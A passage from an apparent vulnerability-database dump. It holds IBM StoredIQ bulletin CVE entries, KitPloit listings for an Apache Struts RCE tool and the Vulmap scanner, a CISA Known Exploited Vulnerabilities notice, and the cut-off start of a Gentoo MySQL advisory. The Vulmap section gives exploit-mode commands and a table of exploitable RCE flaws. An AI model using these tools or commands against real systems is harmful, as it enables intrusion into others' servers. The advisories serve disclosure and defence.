\nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/127479](<https://exchange.xforce.ibmcloud.com/vulnerabilities/127479>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-7957](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7957>) \n**DESCRIPTION: **XStream through 1.4.9, when a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML(\"<void/>\") call. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/125800](<https://exchange.xforce.ibmcloud.com/vulnerabilities/125800>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n \n**CVEID: **[CVE-2016-3674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3674>) \n**DESCRIPTION: **Multiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n\n \n**CVEID: **[CVE-2013-7285](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285>) \n**DESCRIPTION: **Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON. 
\nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/90229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90229>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n\n \n**CVEID: **[CVE-2009-2625](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625>) \n**DESCRIPTION: **XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/53082](<https://exchange.xforce.ibmcloud.com/vulnerabilities/53082>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2013-4002](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002>) \n**DESCRIPTION: **XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85260](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85260>) for the current score. 
\nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n\n \n**CVEID: **[CVE-2012-0881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0881>) \n**DESCRIPTION: **Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2015-6420](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6420>) \n**DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-15708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15708>) \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. 
To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-12384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12384>) \n**DESCRIPTION: **FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162849](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162849>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2019-12814](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12814>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162875>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nStoredIQ | 7.6.0 \n \n## Remediation/Fixes\n\n_Product_ | _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nIBM StoredIQ | 7.6.0.0 - 7.6.0.19 | _N/A_ | Apply Fix Pack 7.6.0.20 that is available from Fix Central. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Feb 2020: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. 
In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSSHEC\",\"label\":\"StoredIQ\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.6.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-20T12:42:12", 
"type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities identified in IBM StoredIQ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0217", "CVE-2009-2625", "CVE-2010-1632", "CVE-2012-0881", "CVE-2012-2098", "CVE-2012-5055", "CVE-2012-5783", "CVE-2013-0248", "CVE-2013-4002", "CVE-2013-7285", "CVE-2014-0050", "CVE-2014-0114", "CVE-2014-3578", "CVE-2014-3603", "CVE-2015-1796", "CVE-2015-6420", "CVE-2016-1000031", "CVE-2016-3093", "CVE-2016-3674", "CVE-2016-5725", "CVE-2017-15708", "CVE-2017-3523", "CVE-2017-3586", "CVE-2017-3589", "CVE-2017-5645", "CVE-2017-7957", "CVE-2018-10237", "CVE-2018-1272", "CVE-2018-20433", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-5427"], "modified": "2020-02-20T12:42:12", "id": "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "href": "https://www.ibm.com/support/pages/node/3106029", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:34", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. 
\n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, 
and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use; poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" file output of results and other main functions; other functions are listed under [Options](<https://github.com/zhzyker/vulmap/#options>) or via python3 vulmap.py -h. In exp mode the poc function is no longer provided; the exploit is carried out directly, and the exploit result is fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3; python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. 
-v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 
| Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci 
remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### 
Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", 
"CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:31:12", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2006-1547 | Apache Struts 1 ActionForm Denial of Service Vulnerability | 07/21/2022 \nCVE-2012-0391 | Apache Struts 2 Improper Input Validation Vulnerability | 07/21/2022 \nCVE-2018-8453 | Microsoft Windows Win32k Privilege Escalation Vulnerability | 07/21/2022 \nCVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability | 02/04/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. 
See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1547", "CVE-2012-0391", "CVE-2018-8453", "CVE-2021-35247"], "modified": "2022-01-25T00:00:00", "id": "CISA:84B5063678E22C88DCF150A265C078F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:53", "description": "### Background\n\nMySQL is a popular multi-threaded, multi-user SQL server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA local attacker could possibly gain escalated privileges. A remote attacker could send a specially crafted SQL query, possibly resulting in a Denial of Service condition. A remote attacker could entice a user to connect to specially 